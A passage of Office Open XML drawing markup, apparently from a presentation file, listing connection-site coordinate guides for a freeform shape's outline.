              <a:gd name="connsiteX44" fmla="*/ 611077 w 1508539"/>
              <a:gd name="connsiteY44" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 608010 w 1508539"/>
              <a:gd name="connsiteY45" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 614840 w 1508539"/>
              <a:gd name="connsiteY46" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 621876 w 1508539"/>
              <a:gd name="connsiteY47" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 624607 w 1508539"/>
              <a:gd name="connsiteY48" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 621311 w 1508539"/>
              <a:gd name="connsiteY49" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 622865 w 1508539"/>
              <a:gd name="connsiteY50" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 629774 w 1508539"/>
              <a:gd name="connsiteY51" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 625630 w 1508539"/>
              <a:gd name="connsiteY52" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 641033 w 1508539"/>
              <a:gd name="connsiteY53" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 646936 w 1508539"/>
              <a:gd name="connsiteY54" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 651669 w 1508539"/>
              <a:gd name="connsiteY55" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY56" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 650769 w 1508539"/>
              <a:gd name="connsiteY57" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 646249 w 1508539"/>
              <a:gd name="connsiteY58" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 641332 w 1508539"/>
              <a:gd name="connsiteY59" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 637897 w 1508539"/>
              <a:gd name="connsiteY60" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 618550 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 622623 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 607879 w 1508539"/>
              <a:gd name="connsiteY63" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 609028 w 1508539"/>
              <a:gd name="connsiteY64" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 607604 w 1508539"/>
              <a:gd name="connsiteY65" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 593899 w 1508539"/>
              <a:gd name="connsiteY66" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 595497 w 1508539"/>
              <a:gd name="connsiteY67" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 588919 w 1508539"/>
              <a:gd name="connsiteY68" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 590250 w 1508539"/>
              <a:gd name="connsiteY69" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 594604 w 1508539"/>
              <a:gd name="connsiteY70" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 599682 w 1508539"/>
              <a:gd name="connsiteY71" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 622276 w 1508539"/>
              <a:gd name="connsiteY72" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 621701 w 1508539"/>
              <a:gd name="connsiteY73" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 622008 w 1508539"/>
              <a:gd name="connsiteY74" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 622035 w 1508539"/>
              <a:gd name="connsiteY75" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 620650 w 1508539"/>
              <a:gd name="connsiteY76" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 619534 w 1508539"/>
              <a:gd name="connsiteY77" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 621267 w 1508539"/>
              <a:gd name="connsiteY78" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 625010 w 1508539"/>
              <a:gd name="connsiteY79" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 624476 w 1508539"/>
              <a:gd name="connsiteY80" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 633172 w 1508539"/>
              <a:gd name="connsiteY81" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 640518 w 1508539"/>
              <a:gd name="connsiteY82" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 639814 w 1508539"/>
              <a:gd name="connsiteY83" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 643257 w 1508539"/>
              <a:gd name="connsiteY84" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 650795 w 1508539"/>
              <a:gd name="connsiteY85" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 652466 w 1508539"/>
              <a:gd name="connsiteY86" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 670029 w 1508539"/>
              <a:gd name="connsiteY87" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 670454 w 1508539"/>
              <a:gd name="connsiteY88" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 672277 w 1508539"/>
              <a:gd name="connsiteY89" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 659112 w 1508539"/>
              <a:gd name="connsiteY90" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 659613 w 1508539"/>
              <a:gd name="connsiteY91" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 647213 w 1508539"/>
              <a:gd name="connsiteY92" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 632398 w 1508539"/>
              <a:gd name="connsiteY93" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 633063 w 1508539"/>
              <a:gd name="connsiteY94" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 623931 w 1508539"/>
              <a:gd name="connsiteY95" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 610540 w 1508539"/>
              <a:gd name="connsiteY96" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 583270 w 1508539"/>
              <a:gd name="connsiteY97" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 525884 w 1508539"/>
              <a:gd name="connsiteY98" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 474802 w 1508539"/>
              <a:gd name="connsiteY99" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 454896 w 1508539"/>
              <a:gd name="connsiteY100" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 445619 w 1508539"/>
              <a:gd name="connsiteY101" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 432580 w 1508539"/>
              <a:gd name="connsiteY102" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 438579 w 1508539"/>
              <a:gd name="connsiteY103" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 441191 w 1508539"/>
              <a:gd name="connsiteY104" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 417520 w 1508539"/>
              <a:gd name="connsiteY105" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 407407 w 1508539"/>
              <a:gd name="connsiteY106" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 391624 w 1508539"/>
              <a:gd name="connsiteY107" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 389082 w 1508539"/>
              <a:gd name="connsiteY108" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 390075 w 1508539"/>
              <a:gd name="connsiteY109" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 381881 w 1508539"/>
              <a:gd name="connsiteY110" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 363059 w 1508539"/>
              <a:gd name="connsiteY111" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 339616 w 1508539"/>
              <a:gd name="connsiteY112" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 293415 w 1508539"/>
              <a:gd name="connsiteY113" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 265726 w 1508539"/>
              <a:gd name="connsiteY114" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 264852 w 1508539"/>
              <a:gd name="connsiteY115" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 245647 w 1508539"/>
              <a:gd name="connsiteY116" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 258727 w 1508539"/>
              <a:gd name="connsiteY117" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 251469 w 1508539"/>
              <a:gd name="connsiteY118" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 237554 w 1508539"/>
              <a:gd name="connsiteY119" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 245861 w 1508539"/>
              <a:gd name="connsiteY120" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 247049 w 1508539"/>
              <a:gd name="connsiteY121" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 251734 w 1508539"/>
              <a:gd name="connsiteY122" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 244016 w 1508539"/>
              <a:gd name="connsiteY123" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 233322 w 1508539"/>
              <a:gd name="connsiteY124" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 222058 w 1508539"/>
              <a:gd name="connsiteY125" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 223514 w 1508539"/>
              <a:gd name="connsiteY126" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 225750 w 1508539"/>
              <a:gd name="connsiteY127" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 218379 w 1508539"/>
              <a:gd name="connsiteY128" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 187787 w 1508539"/>
              <a:gd name="connsiteY129" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 166737 w 1508539"/>
              <a:gd name="connsiteY130" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 166295 w 1508539"/>
              <a:gd name="connsiteY131" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 151966 w 1508539"/>
              <a:gd name="connsiteY132" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 137385 w 1508539"/>
              <a:gd name="connsiteY133" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 142396 w 1508539"/>
              <a:gd name="connsiteY134" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 128338 w 1508539"/>
              <a:gd name="connsiteY135" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 128019 w 1508539"/>
              <a:gd name="connsiteY136" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 107645 w 1508539"/>
              <a:gd name="connsiteY137" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 106893 w 1508539"/>
              <a:gd name="connsiteY138" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY139" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY140" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY141" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY142" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY143" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY144" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY145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64248 w 1508539"/>
              <a:gd name="connsiteY9" fmla="*/ 6574442 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 164588 w 1508539"/>
              <a:gd name="connsiteY10" fmla="*/ 6568530 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 166997 w 1508539"/>
              <a:gd name="connsiteY11" fmla="*/ 6560674 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 167342 w 1508539"/>
              <a:gd name="connsiteY12" fmla="*/ 6560598 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 201349 w 1508539"/>
              <a:gd name="connsiteY13" fmla="*/ 6530567 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 215389 w 1508539"/>
              <a:gd name="connsiteY14" fmla="*/ 6478062 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 226078 w 1508539"/>
              <a:gd name="connsiteY15" fmla="*/ 6460325 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 233311 w 1508539"/>
              <a:gd name="connsiteY16" fmla="*/ 6451488 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 234746 w 1508539"/>
              <a:gd name="connsiteY17" fmla="*/ 6451348 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 239104 w 1508539"/>
              <a:gd name="connsiteY18" fmla="*/ 6414240 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 241880 w 1508539"/>
              <a:gd name="connsiteY19" fmla="*/ 6384857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 240591 w 1508539"/>
              <a:gd name="connsiteY20" fmla="*/ 6367510 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 244471 w 1508539"/>
              <a:gd name="connsiteY21" fmla="*/ 6349778 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 246136 w 1508539"/>
              <a:gd name="connsiteY22" fmla="*/ 6348250 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 262170 w 1508539"/>
              <a:gd name="connsiteY23" fmla="*/ 6281972 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 272933 w 1508539"/>
              <a:gd name="connsiteY24" fmla="*/ 6211940 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 314428 w 1508539"/>
              <a:gd name="connsiteY25" fmla="*/ 6113913 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 318721 w 1508539"/>
              <a:gd name="connsiteY26" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 345501 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 379513 w 1508539"/>
              <a:gd name="connsiteY28" fmla="*/ 5765594 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 411349 w 1508539"/>
              <a:gd name="connsiteY29" fmla="*/ 5693685 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 431404 w 1508539"/>
              <a:gd name="connsiteY30" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 465121 w 1508539"/>
              <a:gd name="connsiteY31" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 494626 w 1508539"/>
              <a:gd name="connsiteY32" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 525819 w 1508539"/>
              <a:gd name="connsiteY33" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 541800 w 1508539"/>
              <a:gd name="connsiteY34" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 575293 w 1508539"/>
              <a:gd name="connsiteY35" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 584892 w 1508539"/>
              <a:gd name="connsiteY36" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 596118 w 1508539"/>
              <a:gd name="connsiteY37" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 597138 w 1508539"/>
              <a:gd name="connsiteY38" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 604479 w 1508539"/>
              <a:gd name="connsiteY39" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 607782 w 1508539"/>
              <a:gd name="connsiteY40" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 608766 w 1508539"/>
              <a:gd name="connsiteY41" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 604400 w 1508539"/>
              <a:gd name="connsiteY42" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 611077 w 1508539"/>
              <a:gd name="connsiteY43" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 608010 w 1508539"/>
              <a:gd name="connsiteY44" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 614840 w 1508539"/>
              <a:gd name="connsiteY45" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 621876 w 1508539"/>
              <a:gd name="connsiteY46" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 624607 w 1508539"/>
              <a:gd name="connsiteY47" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 621311 w 1508539"/>
              <a:gd name="connsiteY48" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 622865 w 1508539"/>
              <a:gd name="connsiteY49" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 629774 w 1508539"/>
              <a:gd name="connsiteY50" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 625630 w 1508539"/>
              <a:gd name="connsiteY51" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 641033 w 1508539"/>
              <a:gd name="connsiteY52" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 646936 w 1508539"/>
              <a:gd name="connsiteY53" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 651669 w 1508539"/>
              <a:gd name="connsiteY54" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY55" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 650769 w 1508539"/>
              <a:gd name="connsiteY56" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 646249 w 1508539"/>
              <a:gd name="connsiteY57" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 641332 w 1508539"/>
              <a:gd name="connsiteY58" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 637897 w 1508539"/>
              <a:gd name="connsiteY59" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 618550 w 1508539"/>
              <a:gd name="connsiteY60" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 622623 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 607879 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 609028 w 1508539"/>
              <a:gd name="connsiteY63" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 607604 w 1508539"/>
              <a:gd name="connsiteY64" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 593899 w 1508539"/>
              <a:gd name="connsiteY65" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 595497 w 1508539"/>
              <a:gd name="connsiteY66" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 588919 w 1508539"/>
              <a:gd name="connsiteY67" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 590250 w 1508539"/>
              <a:gd name="connsiteY68" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 594604 w 1508539"/>
              <a:gd name="connsiteY69" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 599682 w 1508539"/>
              <a:gd name="connsiteY70" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 622276 w 1508539"/>
              <a:gd name="connsiteY71" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 621701 w 1508539"/>
              <a:gd name="connsiteY72" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 622008 w 1508539"/>
              <a:gd name="connsiteY73" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 622035 w 1508539"/>
              <a:gd name="connsiteY74" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 620650 w 1508539"/>
              <a:gd name="connsiteY75" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 619534 w 1508539"/>
              <a:gd name="connsiteY76" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 621267 w 1508539"/>
              <a:gd name="connsiteY77" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 625010 w 1508539"/>
              <a:gd name="connsiteY78" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 624476 w 1508539"/>
              <a:gd name="connsiteY79" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 633172 w 1508539"/>
              <a:gd name="connsiteY80" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 640518 w 1508539"/>
              <a:gd name="connsiteY81" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 639814 w 1508539"/>
              <a:gd name="connsiteY82" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 643257 w 1508539"/>
              <a:gd name="connsiteY83" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 650795 w 1508539"/>
              <a:gd name="connsiteY84" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 652466 w 1508539"/>
              <a:gd name="connsiteY85" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 670029 w 1508539"/>
              <a:gd name="connsiteY86" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 670454 w 1508539"/>
              <a:gd name="connsiteY87" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 672277 w 1508539"/>
              <a:gd name="connsiteY88" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 659112 w 1508539"/>
              <a:gd name="connsiteY89" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 659613 w 1508539"/>
              <a:gd name="connsiteY90" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 647213 w 1508539"/>
              <a:gd name="connsiteY91" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 632398 w 1508539"/>
              <a:gd name="connsiteY92" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 633063 w 1508539"/>
              <a:gd name="connsiteY93" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 623931 w 1508539"/>
              <a:gd name="connsiteY94" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 610540 w 1508539"/>
              <a:gd name="connsiteY95" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 583270 w 1508539"/>
              <a:gd name="connsiteY96" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 525884 w 1508539"/>
              <a:gd name="connsiteY97" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 474802 w 1508539"/>
              <a:gd name="connsiteY98" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 454896 w 1508539"/>
              <a:gd name="connsiteY99" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 445619 w 1508539"/>
              <a:gd name="connsiteY100" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 432580 w 1508539"/>
              <a:gd name="connsiteY101" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 438579 w 1508539"/>
              <a:gd name="connsiteY102" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 441191 w 1508539"/>
              <a:gd name="connsiteY103" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 417520 w 1508539"/>
              <a:gd name="connsiteY104" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 407407 w 1508539"/>
              <a:gd name="connsiteY105" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 391624 w 1508539"/>
              <a:gd name="connsiteY106" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 389082 w 1508539"/>
              <a:gd name="connsiteY107" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 390075 w 1508539"/>
              <a:gd name="connsiteY108" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 381881 w 1508539"/>
              <a:gd name="connsiteY109" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 363059 w 1508539"/>
              <a:gd name="connsiteY110" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 339616 w 1508539"/>
              <a:gd name="connsiteY111" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 293415 w 1508539"/>
              <a:gd name="connsiteY112" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 265726 w 1508539"/>
              <a:gd name="connsiteY113" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 264852 w 1508539"/>
              <a:gd name="connsiteY114" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 245647 w 1508539"/>
              <a:gd name="connsiteY115" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 258727 w 1508539"/>
              <a:gd name="connsiteY116" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 251469 w 1508539"/>
              <a:gd name="connsiteY117" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 237554 w 1508539"/>
              <a:gd name="connsiteY118" fmla="*/ 1373769 h 6858000"/>
